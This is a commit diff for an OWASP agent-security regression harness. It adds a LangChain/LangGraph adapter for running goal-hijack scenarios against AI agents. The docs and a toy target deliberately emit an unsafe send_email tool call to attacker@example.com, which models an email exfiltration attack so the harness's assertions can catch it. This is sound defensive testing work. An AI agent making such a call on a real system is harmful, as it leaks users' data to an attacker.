OWASP
diff --git a/‎README.md‎
Lines changed: 4 additions & 2 deletions b/‎README.md‎
Lines changed: 4 additions & 2 deletions
diff --git a/‎docs/adapters.md‎
Lines changed: 86 additions & 1 deletion b/‎docs/adapters.md‎
Lines changed: 86 additions & 1 deletion
diff --git a/‎examples/targets/langchain_runnable_agent.py‎
Lines changed: 41 additions & 0 deletions b/‎examples/targets/langchain_runnable_agent.py‎
Lines changed: 41 additions & 0 deletions
diff --git a/‎pyproject.toml‎
Lines changed: 2 additions & 2 deletions b/‎pyproject.toml‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎src/agent_harness/cli.py‎
Lines changed: 34 additions & 1 deletion b/‎src/agent_harness/cli.py‎
Lines changed: 34 additions & 1 deletion
@@ -42,7 +42,8 @@ The current CLI supports:
 5. Running scenarios against local Python callable targets
 6. Running scenarios against OpenAI Agents SDK targets
 7. Running scenarios against local MCP workflow targets
-8. Emitting machine-readable result JSON
+8. Running scenarios against LangChain/LangGraph invoke targets
+9. Emitting machine-readable result JSON
 
 Currently implemented assertions:
 
@@ -409,14 +410,15 @@ Currently supported:
 - Python callable target execution
 - OpenAI Agents SDK target execution
 - MVP MCP workflow target execution
+- MVP LangChain/LangGraph invoke target execution
 - JSON result output
 - `no_denied_tool_call` assertion
 - `goal_integrity` assertion
 
 Not implemented yet:
 
 - Full MCP host/runtime adapter support
-- LangChain/LangGraph adapters
+- Broad LangChain/LangGraph adapter coverage beyond the synchronous invoke MVP
 - Full assertion library
 - Secret disclosure detection
 - JUnit output
 
@@ -428,6 +428,92 @@ trace = run_openai_agents_target(scenario, agent)
 
 If the optional dependency is missing, the adapter raises `AdapterError` with an installation hint.
 
+### LangChain/LangGraph adapter
+
+The LangChain/LangGraph adapter is an MVP integration path for synchronous
+LangChain runnables and LangGraph compiled graphs that support `invoke()`.
+
+Install the optional dependency group before using real LangChain or LangGraph
+objects:
+
+```bash
+python -m pip install "owasp-agent-security-regression-harness[langchain]"
+```
+
+Supported MVP path:
+
+```text
+Scenario -> {"messages": [{"role": "user", "content": "<scenario JSON>"}]} -> target.invoke(...) -> Trace
+```
+
+The adapter supports targets loaded from an explicit `module:object` import
+path. The loaded object must provide an `invoke(input)` method or be a callable
+runner function. The first version is intentionally narrow and does not support
+streaming, every callback shape, every historical LangChain agent type, or
+complex LangGraph state introspection.
+
+CLI usage:
+
+```bash
+agent-harness run scenarios/goal_hijack/outbound_email_exfiltration_001.yaml \
+  --langchain-target examples.targets.langchain_runnable_agent:RUNNABLE
+```
+
+Optional goal event:
+
+```bash
+agent-harness run scenarios/goal_hijack/outbound_email_exfiltration_001.yaml \
+  --langchain-target examples.targets.langchain_runnable_agent:RUNNABLE \
+  --langchain-goal-event summarize_document
+```
+
+The adapter records:
+
+- the serialized scenario payload as the user message
+- the final assistant message content when available
+- tool calls found on LangChain-style `AIMessage.tool_calls`
+- OpenAI-compatible tool calls found under `additional_kwargs.tool_calls`
+- adapter and scenario metadata events
+- an optional `goal` event when `--langchain-goal-event` is supplied
+
+Example runnable output:
+
+```python
+{
+    "messages": [
+        AIMessage(
+            content="Sending the email.",
+            tool_calls=[
+                {
+                    "name": "send_email",
+                    "args": {
+                        "to": "attacker@example.com",
+                    },
+                }
+            ],
+        )
+    ]
+}
+```
+
+Resulting harness tool call:
+
+```json
+{
+  "name": "send_email",
+  "arguments": {
+    "to": "attacker@example.com"
+  }
+}
+```
+
+The adapter also accepts result dictionaries with `output`, `answer`,
+`final_output`, or `response` fields for assistant content, and `events` for
+structured trace events.
+
+If a target module imports LangChain or LangGraph but the optional dependency is
+missing, the adapter raises `AdapterError` with an installation hint.
+
 ### MCP workflow adapter
 
 The MCP workflow adapter is an MVP integration path for local
@@ -577,7 +663,6 @@ The HTTP adapter is the universal integration path. Any language or framework ca
 
 Planned adapter families include:
 
-- LangChain/LangGraph adapter
 - Full MCP host/runtime adapter support beyond the current MVP workflow adapter
   (see [MCP Adapter Design](mcp-adapter-design.md))
 
 
@@ -0,0 +1,41 @@
+"""Toy LangChain-style runnable target for local harness demos."""
+
+from __future__ import annotations
+
+from typing import Any
+
+
+class FakeAIMessage:
+    """Small stand-in for a LangChain AIMessage in tests and demos."""
+
+    type = "ai"
+
+    def __init__(self, content: str, tool_calls: list[dict[str, Any]]) -> None:
+        self.content = content
+        self.tool_calls = tool_calls
+
+
+class FakeLangChainRunnable:
+    """Dependency-free runnable that follows the supported invoke path."""
+
+    def invoke(self, state: dict[str, Any]) -> dict[str, Any]:
+        """Return a LangGraph-style state containing an unsafe tool call."""
+        return {
+            "messages": [
+                FakeAIMessage(
+                    "I will send the email.",
+                    [
+                        {
+                            "name": "send_email",
+                            "args": {
+                                "to": "attacker@example.com",
+                                "subject": "Requested information",
+                            },
+                        }
+                    ],
+                )
+            ]
+        }
+
+
+RUNNABLE = FakeLangChainRunnable()
@@ -38,9 +38,9 @@ dependencies = ["PyYAML>=6.0.0"]
 [project.optional-dependencies]
 dev = ["pytest>=7"]
 openai-agents = ["openai-agents"]
-langchain = []
+langchain = ["langchain", "langgraph"]
 mcp = []
-adapters = ["openai-agents"]
+adapters = ["openai-agents", "langchain", "langgraph"]
 
 [project.urls]
 Homepage = "https://github.com/OWASP/Agent-Security-Regression-Harness"
 
@@ -10,6 +10,7 @@
 from agent_harness.runner import (
     dry_run_scenario,
     run_scenario_live,
+    run_scenario_with_langchain_target,
     run_scenario_with_mcp_target,
     run_scenario_with_openai_agent,
     run_scenario_with_python_target,
@@ -98,6 +99,17 @@ def build_parser() -> argparse.ArgumentParser:
             "in module:function format."
         ),
     )
+    run_parser.add_argument(
+        "--langchain-target",
+        help=(
+            "Run the scenario against a LangChain/LangGraph target loaded from "
+            "a module:object import path."
+        ),
+    )
+    run_parser.add_argument(
+        "--langchain-goal-event",
+        help="Optional goal event id recorded in the LangChain/LangGraph trace.",
+    )
     run_parser.add_argument(
         "--openai-agent-max-turns",
         type=int,
@@ -133,12 +145,14 @@ def main() -> int:
             args.python_target is not None,
             args.openai_agent is not None,
             args.mcp_target is not None,
+            args.langchain_target is not None,
         ]
 
         if sum(bool(mode) for mode in selected_modes) != 1:
             parser.error(
                 "'run' requires exactly one of --dry-run, --trace-file, "
-                "--live, --python-target, --openai-agent, or --mcp-target"
+                "--live, --python-target, --openai-agent, --mcp-target, or "
+                "--langchain-target"
             )
 
         if args.live and not args.target_url:
@@ -150,6 +164,15 @@ def main() -> int:
         if args.openai_agent_max_turns is not None and args.openai_agent is None:
             parser.error("--openai-agent-max-turns can only be used with --openai-agent")
 
+        if args.langchain_goal_event is not None and args.langchain_target is None:
+            parser.error("--langchain-goal-event can only be used with --langchain-target")
+
+        if (
+            args.langchain_goal_event is not None
+            and not args.langchain_goal_event.strip()
+        ):
+            parser.error("--langchain-goal-event must be a non-empty string")
+
         if (
             args.openai_agent_max_turns is not None
             and args.openai_agent_max_turns <= 0
@@ -199,6 +222,16 @@ def main() -> int:
             except AdapterError as exc:
                 print(f"adapter error: {exc}", file=sys.stderr)
                 return 1
+        elif args.langchain_target:
+            try:
+                result = run_scenario_with_langchain_target(
+                    scenario,
+                    args.langchain_target,
+                    goal_event_id=args.langchain_goal_event,
+                )
+            except AdapterError as exc:
+                print(f"adapter error: {exc}", file=sys.stderr)
+                return 1
         else:
             try:
                 trace = load_trace(args.trace_file)